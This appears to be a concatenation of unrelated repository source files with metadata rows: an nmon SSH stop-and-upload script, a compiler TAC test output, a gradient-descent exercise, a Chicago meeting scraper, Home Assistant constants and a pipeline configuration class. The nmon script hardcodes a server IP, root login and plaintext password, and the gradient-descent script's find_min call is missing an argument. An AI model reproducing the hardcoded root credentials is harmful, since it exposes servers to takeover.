def run_upload(self,hostname,username,password,RemoteServerPath,LocalFilepath,timeout=15.0):
SSHClient = self.connection(hostname, username, password)
if not self.upload_nmonResult_sftp(hostname,username,password,RemoteServerPath,LocalFilepath):
print("Stop nmon and Upload nmon result Successfully !")
SSHClient.close()
if __name__ == "__main__":
#Passing jenkins environment variables,depend on different OS
#===========================================================================
# hostname = os.environ['ServerHost']
# username=os.environ['ServerRoot']
# password=os.environ['ServerPasswd']
#===========================================================================
hostname = "172.19.6.176"
username="root"
password="suneee"
#===========================================================================
# ftpServer = os.environ['FtpServerHost']
# ftpUser = os.environ['FtpUserName']
# ftpPasswd = os.environ['FtpUserPasswd']
#===========================================================================
#当前还是用执行机本地的路径
RemoteServerPath = '/root'
#LocalFilepath = os.environ['TestReportDir'] + "/TempReport/NmonReport"
LocalFilepath = r"C:\2_EclipseWorkspace\xtcAuto\output" + "\\TempReport\\NmonReport"
sshc = SSHClient(object)
sshc.stop_nmon(hostname, username,password)
time.sleep(5.0)
sshc.run_upload(hostname,username,password,RemoteServerPath,LocalFilepath,timeout=15.0)
| UTF-8 | Python | false | false | 4,997 | py | 93 | Stop_Nmon_On_Centos.py | 37 | 0.555019 | 0.547777 | 0.000201 | 120 | 40.391667 | 133 |
WN1695173791/undergraduate | 11,149,735,136,605 | cc4b165fd1638fc69b2568313d5d329269bfce6f | 50bf62fd5cf747db848c01283e535c8ec59a1f9e | /compiler/decaf_PA3_submit/TestCases/S3/output/q3-super-test4.tac | 1786856e88875dd04cc5a3421cfeb2e4297369fe | []
| no_license | https://github.com/WN1695173791/undergraduate | 19985941ea6ea5fc1cd89c232b228a3a111d0eea | 1261ddd74facbfa7128b05345f6efab7bcb252a0 | refs/heads/master | 2023-03-19T09:41:06.259173 | 2018-06-24T07:57:28 | 2018-06-24T07:57:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | VTABLE(_A) {
<empty>
A
_A.setA;
_A.print;
_A.allprint;
_A.fun;
}
VTABLE(_B) {
_A
B
_A.setA;
_B.print;
_B.allprint;
_B.fun;
_B.setB;
}
VTABLE(_C) {
_A
C
_A.setA;
_C.print;
_C.allprint;
_C.fun;
_C.setC;
}
VTABLE(_D) {
_B
D
_A.setA;
_D.print;
_D.allprint;
_D.fun;
_B.setB;
_D.setD;
}
VTABLE(_E) {
_C
E
_A.setA;
_E.print;
_C.allprint;
_E.fun;
_C.setC;
_E.setE;
}
VTABLE(_F) {
_E
F
_A.setA;
_F.print;
_F.allprint;
_F.fun;
_C.setC;
_E.setE;
_F.setF;
}
VTABLE(_G) {
_C
G
_A.setA;
_G.print;
_G.allprint;
_G.fun;
_C.setC;
_G.setG;
}
VTABLE(_Main) {
<empty>
Main
}
FUNCTION(_A_New) {
memo ''
_A_New:
_T40 = 12
parm _T40
_T41 = call _Alloc
_T42 = 0
*(_T41 + 4) = _T42
*(_T41 + 8) = _T42
_T43 = VTBL <_A>
*(_T41 + 0) = _T43
return _T41
}
FUNCTION(_B_New) {
memo ''
_B_New:
_T44 = 20
parm _T44
_T45 = call _Alloc
_T46 = 0
*(_T45 + 4) = _T46
*(_T45 + 8) = _T46
*(_T45 + 12) = _T46
*(_T45 + 16) = _T46
_T47 = VTBL <_B>
*(_T45 + 0) = _T47
return _T45
}
FUNCTION(_C_New) {
memo ''
_C_New:
_T48 = 20
parm _T48
_T49 = call _Alloc
_T50 = 0
*(_T49 + 4) = _T50
*(_T49 + 8) = _T50
*(_T49 + 12) = _T50
*(_T49 + 16) = _T50
_T51 = VTBL <_C>
*(_T49 + 0) = _T51
return _T49
}
FUNCTION(_D_New) {
memo ''
_D_New:
_T52 = 28
parm _T52
_T53 = call _Alloc
_T54 = 0
_T55 = 4
_T56 = (_T53 + _T52)
_L40:
_T57 = (_T56 - _T55)
_T56 = _T57
_T58 = (_T52 - _T55)
_T52 = _T58
if (_T52 == 0) branch _L41
*(_T56 + 0) = _T54
branch _L40
_L41:
_T59 = VTBL <_D>
*(_T56 + 0) = _T59
return _T56
}
FUNCTION(_E_New) {
memo ''
_E_New:
_T60 = 28
parm _T60
_T61 = call _Alloc
_T62 = 0
_T63 = 4
_T64 = (_T61 + _T60)
_L43:
_T65 = (_T64 - _T63)
_T64 = _T65
_T66 = (_T60 - _T63)
_T60 = _T66
if (_T60 == 0) branch _L44
*(_T64 + 0) = _T62
branch _L43
_L44:
_T67 = VTBL <_E>
*(_T64 + 0) = _T67
return _T64
}
FUNCTION(_F_New) {
memo ''
_F_New:
_T68 = 36
parm _T68
_T69 = call _Alloc
_T70 = 0
_T71 = 4
_T72 = (_T69 + _T68)
_L46:
_T73 = (_T72 - _T71)
_T72 = _T73
_T74 = (_T68 - _T71)
_T68 = _T74
if (_T68 == 0) branch _L47
*(_T72 + 0) = _T70
branch _L46
_L47:
_T75 = VTBL <_F>
*(_T72 + 0) = _T75
return _T72
}
FUNCTION(_G_New) {
memo ''
_G_New:
_T76 = 24
parm _T76
_T77 = call _Alloc
_T78 = 0
_T79 = 4
_T80 = (_T77 + _T76)
_L49:
_T81 = (_T80 - _T79)
_T80 = _T81
_T82 = (_T76 - _T79)
_T76 = _T82
if (_T76 == 0) branch _L50
*(_T80 + 0) = _T78
branch _L49
_L50:
_T83 = VTBL <_G>
*(_T80 + 0) = _T83
return _T80
}
FUNCTION(_Main_New) {
memo ''
_Main_New:
_T84 = 4
parm _T84
_T85 = call _Alloc
_T86 = VTBL <_Main>
*(_T85 + 0) = _T86
return _T85
}
FUNCTION(_A.setA) {
memo '_T0:4 _T1:8 _T2:12'
_A.setA:
_T87 = *(_T0 + 4)
*(_T0 + 4) = _T1
_T88 = *(_T0 + 8)
*(_T0 + 8) = _T2
}
FUNCTION(_A.print) {
memo '_T3:4'
_A.print:
_T89 = " a="
parm _T89
call _PrintString
_T90 = *(_T3 + 4)
parm _T90
call _PrintInt
_T91 = " a1="
parm _T91
call _PrintString
_T92 = *(_T3 + 8)
parm _T92
call _PrintInt
_T93 = " "
parm _T93
call _PrintString
}
FUNCTION(_A.allprint) {
memo '_T4:4'
_A.allprint:
parm _T4
_T94 = *(_T4 + 0)
_T95 = VTBL <_A>
_T96 = *(_T95 + 12)
call _T96
}
FUNCTION(_A.fun) {
memo '_T5:4'
_A.fun:
_T97 = "A"
parm _T97
call _PrintString
parm _T5
_T98 = *(_T5 + 0)
_T99 = VTBL <_A>
_T100 = *(_T99 + 12)
call _T100
_T101 = "\n"
parm _T101
call _PrintString
}
FUNCTION(_B.setB) {
memo '_T6:4 _T7:8 _T8:12'
_B.setB:
_T102 = *(_T6 + 12)
*(_T6 + 12) = _T7
_T103 = *(_T6 + 16)
*(_T6 + 16) = _T8
}
FUNCTION(_B.print) {
memo '_T9:4'
_B.print:
_T104 = " b="
parm _T104
call _PrintString
_T105 = *(_T9 + 12)
parm _T105
call _PrintInt
_T106 = " b1="
parm _T106
call _PrintString
_T107 = *(_T9 + 16)
parm _T107
call _PrintInt
_T108 = " "
parm _T108
call _PrintString
}
FUNCTION(_B.allprint) {
memo '_T10:4'
_B.allprint:
parm _T10
_T109 = *(_T10 + 0)
_T110 = VTBL <_A>
_T111 = *(_T110 + 16)
call _T111
parm _T10
_T112 = *(_T10 + 0)
_T113 = VTBL <_B>
_T114 = *(_T113 + 12)
call _T114
}
FUNCTION(_B.fun) {
memo '_T11:4'
_B.fun:
_T115 = "B"
parm _T115
call _PrintString
parm _T11
_T116 = *(_T11 + 0)
_T117 = VTBL <_A>
_T118 = *(_T117 + 16)
call _T118
parm _T11
_T119 = *(_T11 + 0)
_T120 = VTBL <_B>
_T121 = *(_T120 + 12)
call _T121
_T122 = "\n"
parm _T122
call _PrintString
}
FUNCTION(_C.setC) {
memo '_T12:4 _T13:8 _T14:12'
_C.setC:
_T123 = *(_T12 + 12)
*(_T12 + 12) = _T13
_T124 = *(_T12 + 16)
*(_T12 + 16) = _T14
}
FUNCTION(_C.print) {
memo '_T15:4'
_C.print:
_T125 = " c="
parm _T125
call _PrintString
_T126 = *(_T15 + 12)
parm _T126
call _PrintInt
_T127 = " c1="
parm _T127
call _PrintString
_T128 = *(_T15 + 16)
parm _T128
call _PrintInt
_T129 = " "
parm _T129
call _PrintString
}
FUNCTION(_C.allprint) {
memo '_T16:4'
_C.allprint:
parm _T16
_T130 = *(_T16 + 0)
_T131 = VTBL <_C>
_T132 = *(_T131 + 12)
call _T132
}
FUNCTION(_C.fun) {
memo '_T17:4'
_C.fun:
_T133 = "C"
parm _T133
call _PrintString
parm _T17
_T134 = *(_T17 + 0)
_T135 = VTBL <_A>
_T136 = *(_T135 + 16)
call _T136
parm _T17
_T137 = *(_T17 + 0)
_T138 = VTBL <_C>
_T139 = *(_T138 + 12)
call _T139
_T140 = "\n"
parm _T140
call _PrintString
}
FUNCTION(_D.setD) {
memo '_T18:4 _T19:8 _T20:12'
_D.setD:
_T141 = *(_T18 + 20)
*(_T18 + 20) = _T19
_T142 = *(_T18 + 24)
*(_T18 + 24) = _T20
}
FUNCTION(_D.print) {
memo '_T21:4'
_D.print:
_T143 = " d="
parm _T143
call _PrintString
_T144 = *(_T21 + 20)
parm _T144
call _PrintInt
_T145 = " d1="
parm _T145
call _PrintString
_T146 = *(_T21 + 24)
parm _T146
call _PrintInt
_T147 = " "
parm _T147
call _PrintString
}
FUNCTION(_D.allprint) {
memo '_T22:4'
_D.allprint:
parm _T22
_T148 = *(_T22 + 0)
_T149 = VTBL <_B>
_T150 = *(_T149 + 16)
call _T150
parm _T22
_T151 = *(_T22 + 0)
_T152 = VTBL <_D>
_T153 = *(_T152 + 12)
call _T153
}
FUNCTION(_D.fun) {
memo '_T23:4'
_D.fun:
_T154 = "D"
parm _T154
call _PrintString
parm _T23
_T155 = *(_T23 + 0)
_T156 = VTBL <_B>
_T157 = *(_T156 + 16)
call _T157
parm _T23
_T158 = *(_T23 + 0)
_T159 = VTBL <_D>
_T160 = *(_T159 + 12)
call _T160
_T161 = "\n"
parm _T161
call _PrintString
}
FUNCTION(_E.setE) {
memo '_T24:4 _T25:8 _T26:12'
_E.setE:
_T162 = *(_T24 + 20)
*(_T24 + 20) = _T25
_T163 = *(_T24 + 24)
*(_T24 + 24) = _T26
}
FUNCTION(_E.print) {
memo '_T27:4'
_E.print:
_T164 = " e="
parm _T164
call _PrintString
_T165 = *(_T27 + 20)
parm _T165
call _PrintInt
_T166 = " e1="
parm _T166
call _PrintString
_T167 = *(_T27 + 24)
parm _T167
call _PrintInt
_T168 = " "
parm _T168
call _PrintString
}
FUNCTION(_E.fun) {
memo '_T28:4'
_E.fun:
_T169 = "E"
parm _T169
call _PrintString
parm _T28
_T170 = *(_T28 + 0)
_T171 = VTBL <_E>
_T172 = *(_T171 + 16)
call _T172
parm _T28
_T173 = *(_T28 + 0)
_T174 = VTBL <_E>
_T175 = *(_T174 + 12)
call _T175
_T176 = "\n"
parm _T176
call _PrintString
}
FUNCTION(_F.setF) {
memo '_T29:4 _T30:8 _T31:12'
_F.setF:
_T177 = *(_T29 + 28)
*(_T29 + 28) = _T30
_T178 = *(_T29 + 32)
*(_T29 + 32) = _T31
}
FUNCTION(_F.print) {
memo '_T32:4'
_F.print:
_T179 = " f="
parm _T179
call _PrintString
_T180 = *(_T32 + 28)
parm _T180
call _PrintInt
_T181 = " f1="
parm _T181
call _PrintString
_T182 = *(_T32 + 32)
parm _T182
call _PrintInt
_T183 = " "
parm _T183
call _PrintString
}
FUNCTION(_F.allprint) {
memo '_T33:4'
_F.allprint:
parm _T33
_T184 = *(_T33 + 0)
_T185 = VTBL <_E>
_T186 = *(_T185 + 16)
call _T186
parm _T33
_T187 = *(_T33 + 0)
_T188 = VTBL <_F>
_T189 = *(_T188 + 12)
call _T189
}
FUNCTION(_F.fun) {
memo '_T34:4'
_F.fun:
_T190 = "F"
parm _T190
call _PrintString
parm _T34
_T191 = *(_T34 + 0)
_T192 = VTBL <_E>
_T193 = *(_T192 + 16)
call _T193
parm _T34
_T194 = *(_T34 + 0)
_T195 = VTBL <_F>
_T196 = *(_T195 + 12)
call _T196
_T197 = "\n"
parm _T197
call _PrintString
}
FUNCTION(_G.setG) {
memo '_T35:4 _T36:8'
_G.setG:
_T198 = *(_T35 + 20)
*(_T35 + 20) = _T36
}
FUNCTION(_G.print) {
memo '_T37:4'
_G.print:
_T199 = " g="
parm _T199
call _PrintString
_T200 = *(_T37 + 20)
parm _T200
call _PrintInt
}
FUNCTION(_G.allprint) {
memo '_T38:4'
_G.allprint:
parm _T38
_T201 = *(_T38 + 0)
_T202 = VTBL <_C>
_T203 = *(_T202 + 16)
call _T203
parm _T38
_T204 = *(_T38 + 0)
_T205 = VTBL <_G>
_T206 = *(_T205 + 12)
call _T206
}
FUNCTION(_G.fun) {
memo '_T39:4'
_G.fun:
_T207 = "G"
parm _T207
call _PrintString
parm _T39
_T208 = *(_T39 + 0)
_T209 = VTBL <_C>
_T210 = *(_T209 + 16)
call _T210
parm _T39
_T211 = *(_T39 + 0)
_T212 = VTBL <_G>
_T213 = *(_T212 + 12)
call _T213
_T214 = "\n"
parm _T214
call _PrintString
}
FUNCTION(main) {
memo ''
main:
_T222 = call _A_New
_T215 = _T222
_T223 = call _B_New
_T216 = _T223
_T224 = call _C_New
_T217 = _T224
_T225 = call _D_New
_T218 = _T225
_T226 = call _E_New
_T219 = _T226
_T227 = call _F_New
_T220 = _T227
_T228 = call _G_New
_T221 = _T228
_T229 = 10
_T230 = 11
parm _T215
parm _T229
parm _T230
_T231 = *(_T215 + 0)
_T232 = *(_T231 + 8)
call _T232
_T233 = 20
_T234 = 21
parm _T216
parm _T233
parm _T234
_T235 = *(_T216 + 0)
_T236 = *(_T235 + 8)
call _T236
_T237 = 22
_T238 = 23
parm _T216
parm _T237
parm _T238
_T239 = *(_T216 + 0)
_T240 = *(_T239 + 24)
call _T240
_T241 = 30
_T242 = 31
parm _T217
parm _T241
parm _T242
_T243 = *(_T217 + 0)
_T244 = *(_T243 + 8)
call _T244
_T245 = 32
_T246 = 33
parm _T217
parm _T245
parm _T246
_T247 = *(_T217 + 0)
_T248 = *(_T247 + 24)
call _T248
_T249 = 40
_T250 = 41
parm _T218
parm _T249
parm _T250
_T251 = *(_T218 + 0)
_T252 = *(_T251 + 8)
call _T252
_T253 = 42
_T254 = 43
parm _T218
parm _T253
parm _T254
_T255 = *(_T218 + 0)
_T256 = *(_T255 + 24)
call _T256
_T257 = 44
_T258 = 45
parm _T218
parm _T257
parm _T258
_T259 = *(_T218 + 0)
_T260 = *(_T259 + 28)
call _T260
_T261 = 50
_T262 = 51
parm _T219
parm _T261
parm _T262
_T263 = *(_T219 + 0)
_T264 = *(_T263 + 8)
call _T264
_T265 = 52
_T266 = 53
parm _T219
parm _T265
parm _T266
_T267 = *(_T219 + 0)
_T268 = *(_T267 + 24)
call _T268
_T269 = 54
_T270 = 55
parm _T219
parm _T269
parm _T270
_T271 = *(_T219 + 0)
_T272 = *(_T271 + 28)
call _T272
_T273 = 60
_T274 = 61
parm _T220
parm _T273
parm _T274
_T275 = *(_T220 + 0)
_T276 = *(_T275 + 8)
call _T276
_T277 = 62
_T278 = 63
parm _T220
parm _T277
parm _T278
_T279 = *(_T220 + 0)
_T280 = *(_T279 + 24)
call _T280
_T281 = 64
_T282 = 65
parm _T220
parm _T281
parm _T282
_T283 = *(_T220 + 0)
_T284 = *(_T283 + 28)
call _T284
_T285 = 66
_T286 = 67
parm _T220
parm _T285
parm _T286
_T287 = *(_T220 + 0)
_T288 = *(_T287 + 32)
call _T288
_T289 = 70
_T290 = 71
parm _T221
parm _T289
parm _T290
_T291 = *(_T221 + 0)
_T292 = *(_T291 + 8)
call _T292
_T293 = 72
_T294 = 73
parm _T221
parm _T293
parm _T294
_T295 = *(_T221 + 0)
_T296 = *(_T295 + 24)
call _T296
_T297 = 74
parm _T221
parm _T297
_T298 = *(_T221 + 0)
_T299 = *(_T298 + 28)
call _T299
parm _T215
_T300 = *(_T215 + 0)
_T301 = *(_T300 + 20)
call _T301
parm _T216
_T302 = *(_T216 + 0)
_T303 = *(_T302 + 20)
call _T303
parm _T217
_T304 = *(_T217 + 0)
_T305 = *(_T304 + 20)
call _T305
parm _T218
_T306 = *(_T218 + 0)
_T307 = *(_T306 + 20)
call _T307
parm _T219
_T308 = *(_T219 + 0)
_T309 = *(_T308 + 20)
call _T309
parm _T220
_T310 = *(_T220 + 0)
_T311 = *(_T310 + 20)
call _T311
parm _T221
_T312 = *(_T221 + 0)
_T313 = *(_T312 + 20)
call _T313
}
| UTF-8 | Python | false | false | 13,371 | tac | 339 | q3-super-test4.tac | 123 | 0.451649 | 0.277541 | 0 | 830 | 15.108434 | 30 |
bmoretz/Python-Playground | 18,915,035,986,167 | 3f73820e70f0e98a92f5759939d4e9d4cb51d451 | c947a71a16ed180c920d4b362347f980d93bd2fe | /src/DoingMathInPython/ch_07/challenge/gradient_descent.py | 02f9e62136737f5f7a1777c3969f9305e11c849c | [
"MIT"
]
| permissive | https://github.com/bmoretz/Python-Playground | b69cac015e95d97f46ebd678c4493a44befb556f | a367ec7659b85c24363c21b5c0ac25db08ffa1f6 | refs/heads/master | 2021-05-13T23:35:31.986884 | 2019-11-23T19:07:58 | 2019-11-23T19:07:58 | 116,520,816 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # using GRADIENT DESCENT to find extrema values
'''
Use gradient descent to find the minimum value for a function
'''
import math
from sympy import Derivative, Symbol, sympify
from sympy.core.sympify import SympifyError
from collections import namedtuple
def grad_descent( x0, f1x, v ):
epsilon = 1e-6
step_size = 1e-4
x_old = x0
x_new = x_old - step_size * f1x.subs( { v: x_old } ).evalf()
print( x_new )
while( abs( x_old - x_new ) > epsilon ):
x_old = x_new
x_new = x_old - step_size * f1x.subs( { v: x_old } ).evalf()
print( x_new )
return round( x_new, 7 )
def find_min( f, v, i ):
# Calculate the first derivative
f1x = Derivative( f, v ).doit()
print( f1x )
return grad_descent( i, f1x, v )
if __name__ == '__main__':
try:
f = sympify( input( 'Enter a function in one variable: ') )
v = Symbol( input( 'Enter the variable: ' ) )
i = float( input( 'Enter the initial value: ' ) )
except SympifyError:
print( 'Error parsing the function' )
else:
x_min = find_min( f, v )
value = round( f.subs( { v: x_min } ).evalf(), 7 )
print( 'The global minimum for function {0} is {1} at {2}'.format( f, x_min, value ) ) | UTF-8 | Python | false | false | 1,161 | py | 331 | gradient_descent.py | 307 | 0.628768 | 0.614126 | 0 | 43 | 26.023256 | 88 |
openoakland/councilmatic-scraper | 5,360,119,188,870 | 16938672c3bfdf6e5596dcb7c4277ae10d29ffcb | 581e474926c6d8d44010dbfa32a3ebe156385e04 | /chicago/events.py | 9e282e8eb5d8f14fe7ba619e8fd356786d289e09 | []
| no_license | https://github.com/openoakland/councilmatic-scraper | 9ac52367494e56e9a59fbcc9190ec3ecd77917ba | 996b14ea17c768da3c8ae23079411c918140b320 | refs/heads/dev | 2021-09-16T06:53:00.826308 | 2018-03-28T02:10:19 | 2018-03-28T02:10:19 | 104,142,197 | 9 | 5 | null | false | 2018-03-28T02:10:20 | 2017-09-19T23:55:48 | 2017-12-06T04:33:31 | 2018-03-28T02:10:20 | 1,759 | 2 | 2 | 2 | Python | false | null | from collections import defaultdict
import datetime
import lxml
import lxml.etree
import pytz
import requests
from legistar.events import LegistarAPIEventScraper
from pupa.scrape import Event
class ChicagoEventsScraper(LegistarAPIEventScraper) :
BASE_URL = 'http://webapi.legistar.com/v1/chicago'
WEB_URL = "https://chicago.legistar.com/"
EVENTSPAGE = "https://chicago.legistar.com/Calendar.aspx"
TIMEZONE = "America/Chicago"
def scrape(self) :
for api_event, event in self.events():
description = None
when = api_event['start']
location_string = event[u'Meeting Location']
location_list = location_string.split('--', 2)
location = ', '.join(location_list[0:2])
if not location :
continue
status_string = location_list[-1].split('Chicago, Illinois')
if len(status_string) > 1 and status_string[1] :
status_text = status_string[1].lower()
if any(phrase in status_text
for phrase in ('rescheduled to',
'postponed to',
'reconvened to',
'rescheduled to',
'meeting recessed',
'recessed meeting',
'postponed to',
'recessed until',
'deferred',
'time change',
'date change',
'recessed meeting - reconvene',
'cancelled',
'new date and time',
'rescheduled indefinitely',
'rescheduled for',)) :
status = 'cancelled'
elif status_text in ('rescheduled', 'recessed') :
status = 'cancelled'
elif status_text in ('meeting reconvened',
'reconvened meeting',
'recessed meeting',
'reconvene meeting',
'rescheduled hearing',
'rescheduled meeting',) :
status = api_event['status']
elif status_text in ('amended notice of meeting',
'room change',
'amended notice',
'change of location',
'revised - meeting date and time') :
status = api_event['status']
elif 'room' in status_text :
location = status_string[1] + ', ' + location
elif status_text in ('wrong meeting date',) :
continue
else :
print(status_text)
description = status_string[1].replace('--em--', '').strip()
status = api_event['status']
else :
status = api_event['status']
if description :
e = Event(name=event["Name"]["label"],
start_date=when,
description=description,
location_name=location,
status=status)
else :
e = Event(name=event["Name"]["label"],
start_date=when,
location_name=location,
status=status)
e.pupa_id = str(api_event['EventId'])
if event['Video'] != 'Not\xa0available' :
e.add_media_link(note='Recording',
url = event['Video']['url'],
type="recording",
media_type = 'text/html')
self.addDocs(e, event, 'Agenda')
self.addDocs(e, event, 'Notice')
self.addDocs(e, event, 'Transcript')
self.addDocs(e, event, 'Summary')
participant = event["Name"]["label"]
if participant == 'City Council' :
participant = 'Chicago City Council'
elif participant == 'Committee on Energy, Environmental Protection and Public Utilities (inactive)' :
participant = 'Committee on Energy, Environmental Protection and Public Utilities'
e.add_participant(name=participant,
type="organization")
for item in self.agenda(api_event):
agenda_item = e.add_agenda_item(item["EventItemTitle"])
if item["EventItemMatterFile"]:
identifier = item["EventItemMatterFile"]
agenda_item.add_bill(identifier)
participants = set()
for call in self.rollcalls(api_event):
if call['RollCallValueName'] == 'Present':
participants.add(call['RollCallPersonName'])
for person in participants:
e.add_participant(name=person,
type="person")
e.add_source(self.BASE_URL + '/events/{EventId}'.format(**api_event),
note='api')
try:
detail_url = event['Meeting Details']['url']
except TypeError:
e.add_source(self.EVENTSPAGE, note='web')
else:
if requests.head(detail_url).status_code == 200:
e.add_source(detail_url, note='web')
yield e
| UTF-8 | Python | false | false | 5,857 | py | 23 | events.py | 18 | 0.445279 | 0.442889 | 0.000171 | 138 | 41.442029 | 113 |
home-assistant/core | 18,915,035,993,837 | 3eb66df365968511a06d7320341637fab50c98f4 | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /homeassistant/components/airthings_ble/const.py | 96372919e70aeb2a37cbff757db168937a9f17a9 | [
"Apache-2.0"
]
| permissive | https://github.com/home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | false | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | 2023-09-14T21:50:03 | 2023-09-14T21:50:15 | 470,852 | 62,888 | 24,675 | 2,641 | Python | false | false | """Constants for Airthings BLE."""
DOMAIN = "airthings_ble"
MFCT_ID = 820
VOLUME_BECQUEREL = "Bq/m³"
VOLUME_PICOCURIE = "pCi/L"
DEFAULT_SCAN_INTERVAL = 300
| UTF-8 | Python | false | false | 160 | py | 11,073 | const.py | 9,921 | 0.698113 | 0.654088 | 0 | 9 | 16.666667 | 34 |
EI-CoreBioinformatics/bgrrl | 18,597,208,408,245 | 26d2219287e4b7037c0632d835a89ee3a45a1a42 | 78d313bba7b57396c08ef3931748537bc5ac35a8 | /bgrrl/bgrrl_config.py | 51f8094abb5bae4982df6e58b1ce0f57b0e28e20 | []
| no_license | https://github.com/EI-CoreBioinformatics/bgrrl | 8c3ec9fb8f1c9ab330051f09b6ce20f105cc8fc8 | 46f2d2e66e559536ffa066f789c93f148537d31a | refs/heads/master | 2021-03-27T10:05:31.735977 | 2019-07-30T16:31:56 | 2019-07-30T16:31:56 | 116,812,059 | 0 | 0 | null | false | 2019-05-08T15:38:17 | 2018-01-09T12:15:10 | 2019-05-08T15:24:02 | 2019-05-08T15:38:16 | 928 | 0 | 0 | 10 | Python | false | false | from collections import OrderedDict, namedtuple
import os
from os.path import exists, dirname, basename, join
import sys
import yaml
import pathlib
import glob
from .snakemake_helper import *
ExecutionEnvironmentArguments = namedtuple(
"ExecutionEnvironmentArguments",
[
"scheduler",
"partition",
"no_drmaa",
"max_nodes",
"max_cores",
"hpc_config"
]
)
class ConfigurationManager(OrderedDict):
def __handle_config_file(self, config_file, config_type, file_pattern, warning=""):
try:
init_file = glob.glob(join(self.config_dir, file_pattern))[0]
except:
init_file = ""
if hasattr(self, config_file) and exists(getattr(self, config_file)):
print("Custom {} file specified {}, overriding defaults.".format(config_type, getattr(self, config_file)))
setattr(self, config_file + "_file", getattr(self, config_file))
elif init_file:
print("Found {} file at init location, using this.".format(config_type))
setattr(self, config_file + "_file", init_file)
setattr(self, config_file, init_file)
else:
raise ValueError(
"No valid {} file specified.{}".format(
config_type,
("\n" + warning) if warning else ""
)
)
def __handle_output_dir(self, output_dir, overwrite=False):
outdir_exists = exists(output_dir)
if outdir_exists:
if overwrite:
print(
"Output directory already exists and overwrite was requested (-f option). Deleting directory contents ... ",
end="", flush=True
)
print("DEACTIVATED DUE TO TOO MANY ACCIDENTS.")
# shutil.rmtree(output_dir)
# os.makedirs(output_dir)
else:
print("Output directory already exists, attempting to resume.", flush=True)
else:
pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)
def _create_subdir(subdir, name):
if not exists(subdir):
print(name + " does not exist. Creating " + subdir + " now ... ", end="", flush=True)
pathlib.Path(subdir).mkdir(parents=True, exist_ok=True)
print("done.")
return subdir
self.logs_dir = _create_subdir(join(output_dir, "hpc_logs"), "HPC log dir")
self.config_dir = _create_subdir(join(output_dir, "config"), "Config dir")
self.report_dir = _create_subdir(join(output_dir, "reports"), "Report dir")
self.package_dir = _create_subdir("Data_Package", "Package dir")
#if not exists(self.logs_dir):
# print("HPC log dir doesn't exist. Creating " + self.logs_dir + " now ... ", end="", flush=True)
# pathlib.Path(self.logs_dir).mkdir(parents=True, exist_ok=True)
# print("done.")
#self.config_dir = join(output_dir, "config")
#if not exists(self.config_dir):
# print("Config dir does not exist. Creating " + self.config_dir + " now ...", end="", flush=True)
# pathlib.Path(self.logs_dir).mkdir(parents=True, exist_ok=True)
# print("done.")
#self.report_dir = join(output_dir, "reports")
#if not exists(self.config_dir):
# print("Report dir does not exist. Creating " + self.report_dir + " now ...", end="", flush=True)
# pathlib.Path(self.logs_dir).mkdir(parents=True, exist_ok=True)
# print("done.")
#self.package_dir = "Data_Package"
#if not exists(self.package_dir):
# print("Package dir does not exist. Creating " + self.package_dir + " now ...", end="", flush=True)
# pathlib.Path(self.logs_dir).mkdir(parents=True, exist_ok=True)
# print("done.")
print()
return outdir_exists
def __make_exe_env_args(self):
return ExecutionEnvironmentArguments(
self.scheduler,
self.partition,
self.no_drmaa,
self.max_nodes,
self.max_cores,
self.hpc_config
)
def __make_exe_env(self):
print("Configuring execution environment ... ", end="", flush=True)
self.exe_env = ExecutionEnvironment(
self.__make_exe_env_args(),
NOW,
job_suffix=self.input + "_" + self.output_dir,
log_dir=self.logs_dir
)
print("done.")
print(str(self.exe_env))
def generate_config_file(self, module):
config_file = join(self.config_dir, module + ".conf.yaml")
#if not exists(dirname(config_file)):
# print("Could not find config-dir, creating ... ", end="", flush=True)
# pathlib.Path(dirname(config_file)).mkdir(exist_ok=True, parents=True)
# print("done.")
with open(config_file, "wt") as cfg_out:
config_d = OrderedDict(self._config)
for k, v in sorted(vars(self).items()):
if not k in self._config and k != "_config":
print("WRITING {}: {} -> CONFIG".format(k, v))
config_d[k] = v
print("Writing configuration to file {} ... ".format(config_file), end="", flush=True)
yaml.dump(config_d, cfg_out, default_flow_style=False)
print("done.")
return config_file
def __init__(self, ap_args):
# take all items from argparse args
for k, v in vars(ap_args).items():
setattr(self, k, v)
# check for input
if not hasattr(self, "input"):
try:
self.input = self.input_sheet
except:
raise ValueError("Configuration has neither 'input' nor 'input_sheet' attribute.")
# make sure output-directory exists and create hpclog-directory
self.__handle_output_dir(self.output_dir, overwrite=self.force)
# handle hpc configuration
self.__handle_config_file(
"hpc_config",
"HPC configuration",
"hpc_config.json",
warning=self.alt_hpc_config_warning if hasattr(self, "alt_hpc_config_warning") else "")
# hand this over to ExecutionEnvironment
self.__make_exe_env()
# handle main configuration
self.__handle_config_file(
"config",
"configuration",
"bgrrl_config.yaml",
warning=self.alt_config_warning if hasattr(self, "alt_config_warning") else "")
# Load/edit configuration
print("Loading configuration from {} ... ".format(self.config_file), end="", flush=True)
self._config = yaml.load(open(self.config_file))
print("done.")
print()
self._config["out_dir"] = self.output_dir
# get multiqc configuration for qaa
self.__handle_config_file(
"multiqc_config",
"MultiQC configuration",
"multiqc_config.yaml",
warning=self.alt_multiqc_config_warning if hasattr(self, "alt_multiqc_config_warning") else "")
def __str__(self):
return super(ConfigurationManager, self).__str__() + "\n" + str(self.exe_env)
def setConfiguration(self):
pass
class BGRRLConfigurationManager(ConfigurationManager):
def __manage(self):
cfg_d = {
"etc": join(dirname(__file__), "..", "etc"),
"cwd": os.getcwd(),
"reapr_correction": False,
"run_prokka": self.runmode == "annotate" or (hasattr(self, "run_annotation") and self.run_annotation),
"run_ratt": False,
"package_dir": self.package_dir,
}
self._config.update(cfg_d)
if hasattr(self, "project_prefix"):
prefix = self.project_prefix if self.project_prefix is not None else ""
self._config["project_prefix"] = prefix
if hasattr(self, "prokka_package_style"):
self._config["prokka_package_style"] = self.prokka_package_style
if hasattr(self, "contig_minlen"):
self._config["asm_lengthfilter_contig_minlen"] = max(0, self.contig_minlen)
